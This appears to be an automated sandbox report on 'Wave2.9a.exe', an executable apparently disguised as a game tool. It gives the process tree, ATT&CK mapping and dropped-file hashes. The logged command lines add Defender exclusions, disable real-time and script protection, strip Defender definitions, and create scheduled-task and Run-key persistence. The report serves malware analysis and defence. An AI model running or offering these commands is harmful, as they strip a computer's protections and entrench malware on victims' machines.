C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:82⤵PID:4544
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4240 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:12⤵PID:3596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:12⤵PID:4852
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:12⤵PID:5060
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:12⤵PID:1516
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:12⤵PID:4540
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4660 /prefetch:82⤵PID:4804
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:12⤵PID:2412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6132 /prefetch:82⤵PID:1620
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2224,2393058464966708784,6497895123724132220,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5212 -
C:\Users\Admin\Downloads\Wave2.9a.exe"C:\Users\Admin\Downloads\Wave2.9a.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\roblox.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5568 -
C:\Windows\System32\roblox.exe"C:\Windows\System32\roblox.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5820 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "bloxstrap" /tr '"C:\Users\Admin\AppData\Local\Temp\bloxstrap.exe"' & exit4⤵PID:5992
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "bloxstrap" /tr '"C:\Users\Admin\AppData\Local\Temp\bloxstrap.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:5444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE966.tmp.bat""4⤵PID:5964
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:6156 -
C:\Users\Admin\AppData\Local\Temp\bloxstrap.exe"C:\Users\Admin\AppData\Local\Temp\bloxstrap.exe"5⤵
- Executes dropped EXE
PID:5452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\discord.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844 -
C:\Windows\System32\discord.exe"C:\Windows\System32\discord.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:6128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\discord.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Updater.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Updater.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5840 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Updater" /tr "C:\Users\Admin\AppData\Roaming\Windows Updater.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:6828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076 -
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"3⤵
- Executes dropped EXE
PID:5296 -
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'"5⤵PID:5544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5908 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:5320
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please wait 5 minutes then restart your computer and run the external again.', 0, 'Welcome', 16+16);close()""5⤵PID:5412
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please wait 5 minutes then restart your computer and run the external again.', 0, 'Welcome', 16+16);close()"6⤵PID:5552
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:5684
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:5580
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
PID:6140
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1620
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4144
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5488
-
C:\Users\Admin\Downloads\Wave2.9a.exe"C:\Users\Admin\Downloads\Wave2.9a.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\roblox.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5924 -
C:\Windows\System32\roblox.exe"C:\Windows\System32\roblox.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "bloxstrap" /tr '"C:\Users\Admin\AppData\Local\Temp\bloxstrap.exe"' & exit3⤵PID:6448
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "bloxstrap" /tr '"C:\Users\Admin\AppData\Local\Temp\bloxstrap.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:6724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\discord.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4332 -
C:\Windows\System32\discord.exe"C:\Windows\System32\discord.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6384 -
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"2⤵
- Executes dropped EXE
PID:6716 -
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6976 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'"4⤵PID:6232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:6240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
PID:6112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please wait 5 minutes then restart your computer and run the external again.', 0, 'Welcome', 16+16);close()""4⤵PID:5184
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please wait 5 minutes then restart your computer and run the external again.', 0, 'Welcome', 16+16);close()"5⤵PID:6200
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5992
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6348 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5264
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6080
-
C:\Users\Admin\AppData\Roaming\Windows Updater.exe"C:\Users\Admin\AppData\Roaming\Windows Updater.exe"1⤵
- Executes dropped EXE
PID:5264
-
C:\Users\Admin\Downloads\Wave2.9a.exe"C:\Users\Admin\Downloads\Wave2.9a.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:4604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\roblox.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6556 -
C:\Windows\System32\roblox.exe"C:\Windows\System32\roblox.exe"2⤵
- Executes dropped EXE
PID:6088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\discord.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5432 -
C:\Windows\System32\discord.exe"C:\Windows\System32\discord.exe"2⤵
- Executes dropped EXE
PID:5296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5912 -
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"2⤵
- Executes dropped EXE
PID:5808 -
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'"4⤵PID:5676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:6952 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:6872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
PID:6704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please wait 5 minutes then restart your computer and run the external again.', 0, 'Welcome', 16+16);close()""4⤵PID:6860
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please wait 5 minutes then restart your computer and run the external again.', 0, 'Welcome', 16+16);close()"5⤵PID:5792
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:6884
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:6684 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5940
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:6700
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD50a9dc42e4013fc47438e96d24beb8eff
SHA1806ab26d7eae031a58484188a7eb1adab06457fc
SHA25658d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151
SHA512868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f
-
Filesize
152B
MD561cef8e38cd95bf003f5fdd1dc37dae1
SHA111f2f79ecb349344c143eea9a0fed41891a3467f
SHA256ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
SHA5126fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize288B
MD55af0fabc2327f89755b3af5ac4117079
SHA18544defd4be84cb434f5b9a64ea096a39a691f00
SHA256fb60b14f2b5ae84a2d4923a9d7f9c37b1054215585ba5f4192aa71de18890be7
SHA5128c9d1771dc6eb18098e8bd03a14eb6d4df7e672b758c5d9f7b31404829b4624613cab7bb9889d9435a7128c7a02744e28f4d40108aabb1eee9ed38fd6c0528fd
-
Filesize
391B
MD5ab275d2f26e9f1f7bddfd70d4a6c83b0
SHA1fc2f34a41fde8c1efefa22a4752ed10e05d535f8
SHA2564f4d38c0d6fe7b3375b7ef066d3a80a7b04271803725757754253ec5dcd372bf
SHA512f8d9fee45a9174ef588730aa31c01159fa0aeca2b1dd1d8c016a5697271e83339f6d503e321d28ee4797ab8ff282c7d3aa081370914b749c4b41c034b7b9c921
-
Filesize
6KB
MD597f85e43054613746e0573cefe17be51
SHA1c3f8cde1f374546a5b50e8b5dced8d363018bfb8
SHA25609d0eca21a0da14e94360155293042e588ad706d4f0c068e6d562892d95af899
SHA51296a83e22eda6c4e46596c6f0c405afe53fcc4eddf87867b57613d0b6318c5e2889ad3c886eaeb4f40757c36db04229cf6b34dfa5fd782aabe155dada62fbae6a
-
Filesize
5KB
MD564579db49cbed64874c39908fd4734ef
SHA15ad5e0f185c5a8e53e722ddfaa31391898bb0759
SHA25676e8d84634ad14b26aed7d1cd809c2b3e479afe2c58c9777cea1fa2bac442974
SHA512019986755c35dbde5edaa16bfef785c597f62fde2980d7a92dbb895dee8570c58d1e5e42e3cc5ea0d5b55666de4fe00d859ebd32dc098a185f15a69d876b0653
-
Filesize
6KB
MD5ecd3de2687b042e2c9a55868bda8f977
SHA183607c9408ff8b7991fbb3fdce465090191e92f5
SHA256a842cfad22638bb8ddbe760067fbec7e4013602140c140c605bb714d701373f9
SHA51228b47defcc6f9346e172b7d0b69e39824c2a07471fb97d8ef07ccd3db34a737df528458ce7b4aecf5aa5db170a82b57491cf153381a5c47d109dc71c92f6706e
-
Filesize
6KB
MD5ca527c9b076b40148afb03e32563e672
SHA174ae868be19b6d1294ab6f3fdef3876da38632ea
SHA2569d16aa25670f529f92b3f6d426ce6e4bde28b51a25014ca250881ebab3f935a2
SHA51269b169e2480bc046c9a3061b6e33ade192533c4b404771c2806f7e087c92d3aef1c7afc7d2b2c127335f1d81507fdd259dd0ae7a1517b4aa75296a299f4a9f7f
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD55e969ff16bc5e8f779c017531e09265e
SHA1c4ad280765b84a023fb3fd54c74c9e953a819257
SHA256f919f2afab225f98750b8290f7b47c23fdd7fe93e1474dcb36c57afbdf0d941c
SHA512d69c54d31d953de40b398a17480549facb13ea39033173e465e14aebc6a8b6b3d6ffbd3db7656486baa3f1079b2ad573e215b5f932b1130f63a1b28a541f46d8
-
Filesize
11KB
MD57ba269c342953511f0d1e71fdaa1098a
SHA1fa48f0b26cfb4f17b3fc796f9902f80fc53fd2ed
SHA256cba068a19be95f43e116ab9fa7814b6163f2b3e156f2f9b7e28b44f7db0b7451
SHA512713d2d7c25032ce455f857ecbb9bfbcb8c51b9ae4eff449eeb8f51d56add3cf0b1bdc3d4f0b363c8480d70eade8f126a474ebd1b83b0c363008225b73862b4ad
-
Filesize
11KB
MD5f95d13fca3be4f77012d157e63487235
SHA150e7c75fd8f3510eeb207e9e856ba7b8a431d807
SHA256284b6069d64e98c47ab24b23ba77ce3bdb16f3b6971ee8f3b8a0c970c99af67f
SHA5129295fe1d3abaa7159f949e5b114b08d3f5b515796794d1cb9851b335f21966f85137e87fef0932ba17a3c4206e279b4e0becbc6c61cd5f50cdc04ddb3801ed1e
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD592075279f2dbcaa5724ee5a47e49712f
SHA18dd3e2faa8432dde978946ebaf9054f7c6e0b2cb
SHA256fd985ddd090621af25aa77aebff689c95ea7679ff0e81887124b2802ae3e9442
SHA512744c62556233d9872f43ffb5a5a98aee20a44834436306f0a948c8c4072bdb46ef8044616593747edd645caaee60faf8b14fedb2d6df5f6019b5c73357d80d22
-
Filesize
106KB
MD5870fea4e961e2fbd00110d3783e529be
SHA1a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA25676fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA5120b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88
-
Filesize
56KB
MD5813fc3981cae89a4f93bf7336d3dc5ef
SHA1daff28bcd155a84e55d2603be07ca57e3934a0de
SHA2564ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06
SHA512ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc
-
Filesize
21KB
MD5e8b9d74bfd1f6d1cc1d99b24f44da796
SHA1a312cfc6a7ed7bf1b786e5b3fd842a7eeb683452
SHA256b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59
SHA512b74d9b12b69db81a96fc5a001fd88c1e62ee8299ba435e242c5cb2ce446740ed3d8a623e1924c2bc07bfd9aef7b2577c9ec8264e53e5be625f4379119bafcc27
-
Filesize
21KB
MD5cfe0c1dfde224ea5fed9bd5ff778a6e0
SHA15150e7edd1293e29d2e4d6bb68067374b8a07ce6
SHA2560d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e
SHA512b0e02e1f19cfa7de3693d4d63e404bdb9d15527ac85a6d492db1128bb695bffd11bec33d32f317a7615cb9a820cd14f9f8b182469d65af2430ffcdbad4bd7000
-
Filesize
21KB
MD533bbece432f8da57f17bf2e396ebaa58
SHA1890df2dddfdf3eeccc698312d32407f3e2ec7eb1
SHA2567cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e
SHA512619b684e83546d97fc1d1bc7181ad09c083e880629726ee3af138a9e4791a6dcf675a8df65dc20edbe6465b5f4eac92a64265df37e53a5f34f6be93a5c2a7ae5
-
Filesize
21KB
MD5eb0978a9213e7f6fdd63b2967f02d999
SHA19833f4134f7ac4766991c918aece900acfbf969f
SHA256ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e
SHA5126f268148f959693ee213db7d3db136b8e3ad1f80267d8cbd7d5429c021adaccc9c14424c09d527e181b9c9b5ea41765aff568b9630e4eb83bfc532e56dfe5b63
-
Filesize
25KB
MD5efad0ee0136532e8e8402770a64c71f9
SHA1cda3774fe9781400792d8605869f4e6b08153e55
SHA2563d2c55902385381869db850b526261ddeb4628b83e690a32b67d2e0936b2c6ed
SHA51269d25edf0f4c8ac5d77cb5815dfb53eac7f403dc8d11bfe336a545c19a19ffde1031fa59019507d119e4570da0d79b95351eac697f46024b4e558a0ff6349852
-
Filesize
21KB
